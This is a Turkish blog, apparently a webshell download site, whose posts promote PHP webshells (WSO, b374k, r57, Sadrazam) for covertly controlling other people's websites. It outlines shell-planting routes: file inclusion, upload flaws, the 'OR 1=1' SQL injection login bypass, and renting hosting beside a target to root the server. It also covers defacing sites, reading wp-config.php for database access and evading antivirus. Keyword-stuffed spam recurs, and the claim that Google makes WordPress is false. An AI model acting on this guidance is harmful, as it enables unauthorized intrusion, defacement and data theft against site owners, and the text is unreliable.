SQL injection nasıl yapılır

Posted by admin on 11/07/17 in Php Shell indir

SQL injection nasıl yapılır

Bir web sitesi sahibinin SQL injection nasıl yapılır hakkında yeteri kadar olmasa da kısmi bilgilere sahip olması gerekir. Çünkü buna karşı önlem alınmadığı zaman ciddi zararlarla karşılaşabilirsiniz. Kısacası sizlere bu yazımızda SQL injection dan nasıl korunabileceğinizi anlatacağız. Ancak öncesinde ne demekmiş kısaca değinelim.

Öncelikle web sitelerinin oluşumunda, verilerin online tutulmasında Veritabanı en önemli ihiyaçlardan birisidir. Kısacası veritabanı olmayan bir site olmaz düşünülmesi bile saçma gelir. Web üzerinden veritabanı terimi ise MYSQL olarak bilinir. Ancak MYSQL içinde şu dillere yer verir. (MySQL,  Sqlite, Oracle SQL) SQL (Structured Query Language) bunlar bizim aklımızda kalması gereken bilgilerdir. MYSQL içerisinde SQL sorgusu çalıştırır. SQL injection nasıl yapılır ise bu sorguya müdahele ederek bazı bilgiler edinmeye çalışır. Yani sizin SQL sorgunuzun içine girmeye çalışır girdiğinde de işlemini yapar. Bu demek oluyor ki SQL sorgusu ile içeri giren SQL injection normalde sadece site yöneticisinin görmesi gereken detayları görmeye yarar. Yani kullanıcılar, üyeler, profiller, şifreler, tanımlamalar ve daha fazlasını sayabiliriz. Kısmi olarak düşünülmelidir ki bir sitenin normalde ikincil kişilerin görmesini istemediği özel bilgileri bulmasına yarar.

Çok uzun değil yakın zamanda Yahoo gibi büyük bir internet sitesi devinin bile SQL injection sayesinde bilgilerinin alındığı haberini hepimiz çok iyi hatırlamaktayız.

Peki, SQL injection Nasıl Yapılır? Tam Mantığını Çözmek İçin Örneğe Dikkat Edin!

Üye olunabilen bir site düşünün. ‘’ Üye Ol ‘’ dediniz ve users Ahmet olsun. Password ise Mehmet olsun. Bu örnek olsa da böyle basit şifreleri zaten mevcutta yeni sistemde kabul edilmemektedir. Bu şekilde siteye giriş yaptığınız zaman SQL aşağıdaki şekilde bir sorgu yapacaktır.

SELECT * FROM kullanicilar WHERE isim=’ahmet’ AND sifre=’mehmet’ bu şekilde bir sorgu yaptığınızda eğer sistemde böyle bir kayıt varsa normal olarak giriş yapacaktır. Ancak users, password alanına OR 1=1 yazdığınız zaman ise aslında bir deneme yapmış olacaksınızdır. Bu kod asla unutulmamalıdır. Buna göre SQL injection nasıl yapılır durumu kontrol edecek ve eğer izin varsa girişe izin verecektir. Yani OR 1=1 her zaman olumlu kullanıcı parola denemesi yapar.

1n73ction Shell 1n73ction Shell 2016 1n73ction Shell bypass 1n73ction Shell download 1n73ction Shell indir 1n73ction Shell new version 1n73ction Shell priv8 b374k b374k php bypass b374k php shell b374k rar b374k Shell b374k Shell bypass b374k Shell down b374k Shell download b374k Shell indir b374k Shell php b374k Shell txt b374k Shell yükle b374k txt Php 1n73ction Shell Priv8 Wso shell

Sadrazam shell

Sadrazam shell angel Sadrazam shell bypass Sadrazam shell download Sadrazam shell indir Sadrazam shell logsuz Sadrazam shell rar Sadrazam shell yükle Sadrazam shell zip Shell download Shell indir WSO Wso 2.5 shell Wso 2.5.1 wso 2.7 shell download Wso hack shell Wso shell wso shell 2.7 Wso shell bypass Wso shell download Wso shell full Wso shell indir Wso_2.7 download

Shell indirme sitesi

Posted by admin on 10/07/17 in Php Shell indir

Shell indirme sitesi

Sitemiz için sunucu ya da Hosting aldığımız zaman bu sunucuların bazılarında Shell erişimlerine izin verildiği görülmektedir. Peki, daha önce Shell indirme sitesi hakkında genel bilgi verdiğimiz paylaşımlarımız olmuştu. Tekrar buradan kısaca Shell nedir konusunu ele almak istersek eğer; Sunucu üzerinden komut satırı olan yani ‘’ bilgisayarım, başlat, cmd yaz, enter yap ) şeklinde uyguladığımız ve karşımıza çıkan siyah ekranlı komut satırını kullanarak bir takım yetkileri kendimize göre düzenlememizi sağlayan bir uygulamadır.

Shell Nasıl atılır diye merak edenlerinizin olduğunu da düşünmüyor değiliz. Öncelikle karşınıza birçok aşama gelecektir. Yüz üstü bu aşamaları kısaca sizlere anlatalım.

Remote File Inclusion Açıklarından faydalanabiliriz
SQL Injection Açıklarından faydalanabiliriz
Exploits Kullanarak Yükleme yapabiliriz
Upload Açıklarından faydalanabiliriz
Logger vb Spy Yazılımlardan faydalanabiliriz
Hedef Sunucudan Hesap Açarak yükleme yapabiliriz
Sosyal Mühendislik kullanarak yükleme yapabiliriz.
Bypass shell ile sunucuyu bypass layabiliriz ve symlink ile sunucudaki siteleri görebiliriz.

Webroot indirerek’te bu işlemleri kolayca yapabilrsiniz.

Remote File Inclusion demek; .txt uzantılı dosyaları kendinize göre düzenledikten sonra eğer Permissionları açık olan yani yetkileri açık olan Shell indirme sitesi için istediğinizi yapabilirsiniz anlamına gelmektedir.

Özellikle hacklink yapma konusunda bir takım işlemleri yapmak istiyorsanız Shell indirme sitesi ya da sitelerine girerek bir takım bilgileri öğrenmeniz gerekiyor. Sitemiz üzerinden indireceğiniz Shell ile Permissionları açık olan sitelerden tam yetkiye sahip olabilmektesiniz. Buna göre ister  txt shell dosyalarında düzenleme yapın, isterseniz index.html upload ederek istediğinizi yapın. Bunlar tamamen sizin kontrolünüzde olacak şeylerdir.

Mesela kendinize bir site belirlediniz. Ancak hiçbir açığını da bulamıyorsunuz. Belki de içinizi yiyorsunuz. Ancak bununda elbet bir yöntemi var. O sitenin hostunun barındığı Hosting firmasından kendinize Hosting alın. Bu hostinginizin içerisine site kurun normal sıradan birisiymiş gibi sitenizle ilgilenin hiç çaktırmayın. Çünkü sizin niyetiniz oldukça farklı! Daha sonrasında ise kendi sitenize Shell atarak serveri root hale getirir ve istediğimizi başarırız. Shell indirme sitesi mantığı tamamen bu şekildedir. Hedef siteye bu şekilde elbet ulaşabilirsiniz. Ancak eğer çok acemi biriyseniz direkt olarak bu konu üzerinden yola çıkmanız demek işinizin bir hayli zor olması demektir.

Shell indir

Posted by admin on 10/07/17 in Php Shell indir

Shell indir

Shell indir

Shell nedir şeklinde bir soru ile karşılaşıldığında şunu ifade etmemiz gerekebilir. Shell indir dediğinde karşısına gelen adımları uygulaması karşılığında yüklenmiş olan sitenin bir takım yetkilerini ele geçirmiş anlamına gelir. Bu yetkiler genelde dosyalara erişim hakkınızın olmasıyla sınırlı kalabilir. Ancak site sahibinin yetkisine sahip olmak için sitenin Permisionlarının açık olması gerekmektedir. Buna göre sitedeki admin yetkisi ya da sitenin sistem yöneticisi yetkilerine sahip olmak mümkündür. Permission yetkisi aslında Shell atılan sitenin size verdiği full yetki olarak da adlandırılabilir.

Shell yüklendiği zaman yüklenen sitenin size bir yetki vermesi anlamına da gelir. Genelde yetkiler, okuma, yazma, silme, değiştirme yetkileri olmaktadır. Google’a girerek ‘’ Shell indir ‘’ demeniz ve aratmanız doğrultusunda sizlere birçok indirebileceğiniz alanlar gelecektir. Shell çeşitleri de bir hayli fazla olduğundan alt kısımlarında gerekli olan açıklamalar dahilinde sizlerde gerekli işlemleri başarılı bir şekilde yapabilirsiniz. Sitemiz üzerinden yine Shell indirmeye çalışabilirsiniz. Emin olunuz ki bu çalışma sizlere doğru bilgiler eşliğinde destek veren yapıcı açıklamalarla sizlere sunulmuştur. Yetkileri aldığınız sitede bazen ta yetkiye sahip olamayabilirsiniz. Gerekli olan bir takım açıklamaları okumanız durumunda bunu da başarabilirsiniz. Aslında full yetki ile yarım yetki arasında da bir fark yoktur. Niye diye soracak olursanız sistemi server root resetlemesi ile yarım olan yetkinizi full yetkiye çevirebilmektesiniz. Sadece biraz zamana ihtiyacınız var desek yeridir.

İzinleri açık olan bir siteye Shell indir diyerek gerekli işlemleri yaptığınızda genel olarak yetkiniz silme, okuma, değiştirme ve görme şeklinde olacaktır. Buna Permission yetkileri açık olan bir site demekteyiz. Permission yani izinleri kapatılmış olan bir sitede yetkileriniz tamamıyla sınırlı kalacaktır. Yapmanız gereken tek şey server root resetlemesi olmalıdır. Shell atacağınız bir siteye upload yetkiniz yoksa eğer full yetki sahibi değilsiniz demektir. Genelde index atmak isteyen kişiler full yetkiye sahip olmak isterler. Ancak gerekli adımları izlemeniz durumunda yetkileri alıp index.html adında bir dosya oluşturup Mevcutta bulunan index.php dosyasını silerek yerine html uzantılı olanını atmanız başarıyı aslında getirecektir. Bu işlemi yapıp direkt olarak çıkış yapabilirsiniz.

Shell çeşitleri

b374k php Shell, r57shell, r57.php, r57.txt, c99.php, c99.txt, Antichat Shell, CIH.[ms] WebShell, wso 2.5.1 Shell, wso php shell, webadmin php shell, bypass shell, Shell indir

 

R57 Shell indir

Posted by admin on 09/07/17 in Php Shell indir

R57 Shell indir

 

Farklı bir kişiye ait olan web sitesinde sizin de yetkiniz olmasını ister miydiniz? Üstelik site sahibinin hiç haberi bile olmadan istediğiniz şekilde site kodlarıyla oynayabilirsiniz. Size önereceklerimiz arasında R57 Shell indir olarak sitemizde yayınladığımız link üzerinden indirim sağlayabilirsiniz. Okuma, yazma, silme ve değiştirme yetkileri tamamen sizde olacak demektir. Shell atma olarak bilinen bu yöntem sayesinde sizde hacklink denilen mevzudan yararlanabilirsiniz. Ancak bilinmesi gereken iki önemli kural vardır. Bunlardan birisi değiştirme, silme, okuma gibi özellikleri kullanmanız için birincisi site sahibinin yetkilerine sahip olmak, diğeri ise Hosting sunucusunun sahibi gibi siteye erişim hakkınızın olması gibi… Yani site sahibinin yetkileri ile Hosting üzerinden alacağınız iki farklı yöntem bulunmaktadır. Silme, okuma, yazma ve değiştirme yetkilerini site sahibinin yetkileri ile sınırlı tutabilirken tam yetki ise tamamen Hosting yetkisini almanızla devam eden bir husus olarak bilinmelidir.

Yukarıda anlattığımız durumlar aslında sitenin Permission yetkisiyle alakası vardır. Permissionları açık olan bir sitede istediğinizi yapabilir ancak Permissionları kapalı olan bir sitede bir takım şeyleri aşmanız gerekiyor. Bunun için tam yetkiye ulaşmanız için serveri rootlamanız gerekmektedir. R57 Shell indir dediğinizde bir takım süreci de başlatmış olursunuz.

Shell kullanmak bilgi gerektiren bir işlemdir. R57 Shell indir dediğinizde aslında Shell komutlarını da iyi bir şekilde bilirseniz eğer çok rahat bir şekilde bu işin üstesinden gelebilirsiniz. Sitelerde tam yetkiye sahip olabilmek için komut bilginizin iyi olmasını öneriyoruz.  Özellikle sunucuların birçoğu manuel geçişlere izin vermektedir. Bunun amacı nedir tam olarak bilinmez ama bu geçişle birçok açık ta ortaya çıkmaktadır. Ancak bu süreci başlatmanız için de Spoll – Mail linkine tıklayarak sunucudaki diğer kullanıcı adı ve parolalarını görmeniz sağlanacaktır. Bu süreci de aştıktan sonra adres çubuğundan manuel geçişleri sağlayabilirsiniz.

Bazen Shell sayesinde sitelere full yetkiye sahip olabiliyorsunuz. Eğer full yetkiniz varsa sitenin index ’ini değiştirebilmektesiniz. Bunun için index. html yapmanız yeterli olacaktır. Ancak yetkinizde bir kısım engellemeler varsa bunu da Config.php dosyası üzerinden kurcalamanız durumunda istediğinizi yapabilirsiniz.

Php Shell sitesi

Posted by admin on 08/07/17 in Php Shell indir

php shell sitesi

Son zamanların webmaster tarafından en çok kullanılan ve revaçta olan uygulamalarından birisi de Shell olmaktadır. Php Shell sitesi olarak tanımlanan bu uygulamada amaç karşı siteye yüklendiği zaman sizlere yine bir takım yetkilerin verilmesini sağlamaktadır. Yani sizin Shell uygulamanız karşı tarafa yüklendiğinde o sitenin hâkimiyetini kısmi de olsa elinizde bulundurmanız gerekiyor demektir. Ancak bu yetki sınırlı olacağı için okuma, yazma ve silme olarak da tanımlanabilir. Her ne kadar biz buradan sınırlı olarak belirtsek te bu bazen değişkenlik gösterebiliyor. Shell atma olarak tabir edilen bu uygulama sayesinde site sahibinin site paneli üzerindeki yetkiye sahipsiniz demektir. Bazı durumlarda ise yine farklı olarak sitenin Hosting tarafına haki olduğunuzda söylenebilir. Permission yetkisi olarak bilmenizde faya var. Yani Permission yetkisi sizin Shell siteniz üzerinden karşı siteye bir uygulama yüklendiği zaman aslında o siteyi artık ele geçilmiş ve istediğiniz gibi gizliden gizliye yönetebiliyorsunuz demektir.

Php shell indirme düşünüldüğü zaman aslında akla oldukça mantıklı gelmektedir. Siz bir sitenin şifrelerini değiştirmeden o sitenin paneline hakim olabiliyorsunuz. Php Shell sitesi denildiğinde aklınıza gelecek olan bu mantık sayesinde karşı tarafın loglarının alınması ile başlanacaktır. Buna göre istediğiniz gibi sitede iz belli etmeden kendi düşüncelerinize göre hareket edebiliyorsunuz. Bunun adına ister hacklink deyin isterseniz php shell bu tamamen sizin elinde olan bir kontrol mekanizmasıdır.

Permissionları açık olan bir Php Shell sitesi düşündüğünüz zaman o sitenin tüm klasörlerine müdahale edebilir, tüm dosyalarını görebilir, okuyabilir, düzenleyebilir hatta silebilirsiniz. Ayrıca mevcut yapının üzerine yüklemeler de yapabilirsiniz. Site sahibinin ise bunlardan hiç haberi olmayacaktır. Tabi profesyonel olarak gidişatı sağlarsanız buda yine sizin elinizde! Permssionları açık olan bir php açıkları olan sitede bunları yapabilirken hadi diyelim ki Permissionları kapalı bir siteye denk geldiniz bu kadar emek boşuna mı tabi ki hayır. Serveri rootlamanız demek yine bu yetkilere sahip olmanız demektir. En başta dediğimiz gibi kısmi yetkiler ve tam yetkiler ile karşınıza çıkan bir anlayışa hizmet vereceksiniz demektir. Ancak bilmelisiniz ki sunucularda bazı yetkiler sınırlı olacaktır.

WordPress Açıkları

Posted by admin on 08/07/17 in Php Shell indir

WordPress Açıkları

WordPress bilindiği üzere Google tarafından çıkarılan bir web yazılımıdır. Eski dönemlere bakıldığı zaman web sitesi yapacak olan kişiler HTML, PHP ya da ASP yazılımları ile site kurarken bu yazılımlara artık ara verilmiş ya da çok nadiren insanlar yönelmektedir. Günümüzde insanların Google’da kelime bazlı yükselişe geçmeleri için Google büyük bir çoğunlukta WordPress yazılımını ön plana çekmektedir. Yani ASP ile yapılmış site gerilerde iken WordPress ile yapılmış site daha çabuk ön sıradaki yerlerini almaktadır. Hal böyle olunca WordPress açıkları da bazen karşımıza çıkmıyor değil. Her ne kadar destekleyicisi Google gibi büyük bir şirket olsa da açıkları yakalandığında hackerlar tarafından affedilmiyor olabilmektedir.

WordPress tercih edilmesindeki bazı sebeplerden birisi de çabuk kuruluyor olmasının yanı sıra web yazılımcıları tarafından uygun temaların hızlı bir şekilde yapılması kullanıcıların da bu temaları çok çabuk sitelerine yüklemeleri ile kısacası kullanım kolaylığı ile tercih edilmektedir. Admin paneli ise WordPress açıkları arayan kişiler tarafından didik didik aranan sonuçlardan olsa da aslında çokta taviz vermeyen bir yazılım olarak görmekteyiz.

WordPress ayrıca ücretsiz olduğu için de bazen tercih sebebi olabiliyor. Buna göre açık kaynaklı ve ücretsiz olması web kategorisinde ilgisi olan kişilerinde wordpress üzerine bazı eklentiler ya da temalar oluşturarak ticaret yaptıklarını da görmekteyiz. Dünyada en çok kullanılan yazılım olarak bilindiği için önemli bir WordPress açıkları olması durumunda dünyada ciddi anlamda bir kaos yaşanabilir. Bu sebeple açık bulmak aslında çok zordur.

WordPress 2013 yılında geliştirdiği bir sistemle otomatik olarak uzaktan güncellenebilir hale getirilmiştir. Ancak bir defasında bu güncelleme bir felakete de yol açacak gibi göründü. Geçmiş zamanda uzaktan güncelleme alan wordpress sitelerine hackerlar güncelleme esnasında bir açık bularak yazılımın içine sızmayı başarabileceklerdi. Ancak bunu erken öğrenen WordPress yazılımcıları bu açığı hemen kapattılar ve olası bir hack durumunun da önüne geçilmiş oldu. Eğer bu durum fark edilmeseydi o zamanlar dünyanın %25’i hackten nasibini alacaklardı. Bu sorunu nasıl ortadan kaldırdı diyenler mutlaka vardır. WordPress açık kaynaklı güncelleme aldığı için otomatik olarak sistemleri bu uyarıyı verince gerekli önlemlerde alınmış oldu.

Sadrazam shell kullanımı

Posted by admin on 08/07/17 in Php Shell indir

sadrazam shell kullanımı


Sadrazam shell kullanımı
aslında bir çok kullanıcıya göre kolaydır. Piyasaya çıkmış en basit shellerden birisidir. Bir çok hacker bu yüzden Sadrazam shell tercih etmektedir. Sadrazam shell.txt shell içerisinde bulunun kodlardan sunucuya upload etmek için Sadrazam.php gibi yazılım kullanılmaktadır. Sunucudaki siteleri görmek için /var/named/ komutu uygulanmaktadır./var/mail/ komutuylada sunucudaki kullanıcı adları kullanılır. Genel olarak wordpress sitelerde dizinlerinde wp-config.php bularak Sadrazam shell ile sql bağlantısı yaparak sunucununda veritabanına ulaşabiliyorsunuz. Sadrazam shell anlıycağınız permler yeşili gösterdiğinde bu yazı yazma işlemi var anlamına gelmektedir, beyaz gösterdiğinde yazı yazma işleminiz yoktur. Şunu unutmayalımki sadrazam shell’in bir diğer adı da angel shell olarak bilinmektedir.

wso shell indir

Posted by admin on 07/07/17 in Wso shell

wso shell

 

Sadrazam shell den sonra en çok iş gören shellerden birisi diyebiliriz. neredeyse her işlemi yapabileceğiniz bir php shell dir. Kullanımı açısından çok basit ve bilindik bir arayüze sahip. Sorunsuz performansı yüksek komut istemcisiyle sizlere sunuyoruz. İyi kullanımlar.

  • Özellikleri
    Dosya yöneticisi (kopyalama, yeniden adlandırma, taşıma, silme, chmod, dokunma, dosya ve klasörler oluşturma)
    Görüntüleme, hexview, düzenleme, indirme, dosya yükleme
    Zip arşivleriyle çalışma (paketleme, ambalaj açma) + sıkıştırma tar.gz
    Konsol
    SQL Yöneticisi (MySql, PostgreSQL)
    PHP kodunu yürütün
    Dizelerle + karma arama çevrimiçi veritabanlarıyla çalışma
    Bindport ve geri bağlanma (Perl)
    Kaba kuvvet FTP, MySQL, PgSQL
    Dosyalarda arama yapın, dosyalarda metin arayın
    Antipoiskovik (Kullanıcı Aracısını kontrol et, eğer bir arama motoru 404 hatasını verirse)
    AJAX’ı kullanabilirsiniz
    Küçük boy. Kutulu versiyon 22.8 Kb’dir
    Kabuk kullanan kodlamanın seçimi.

WSO SHELL  .TXT

WSO SHELL DOWNLOAD

 

b374k Shell

Posted by admin on 06/07/17 in b374k Shell

b374k Shell DOWNLOAD – WSO SHELL İNDİR

b374k Shell basitliği ve hızlı işlemleriyle öne çıkıyor ve en rahat düzenleme yapılabilen php shellerinden biridir, zaten son 3 yılda birkaç shell ile birlikte piyasada en çok yayılan php shellerden birisidir. Bir çok shell yerine bu shell’i kullanmanın avantajlarından birisi clamav gibi antivirüsleri bypass edebilmesidir. Serverlarda zararlı yazılımlar için kurulan antivirüsler php dosyallarını ve upload-form’larını engeller fakat kendine has crypt taktiği ile bu antivirüs’ü aşabilmesi hackerları adeta kendine hayran bıraktı. iyi kullanımlar.

shell login password: b374k

b374k SHELL  .TXT

b374k SHELL DOWNLOAD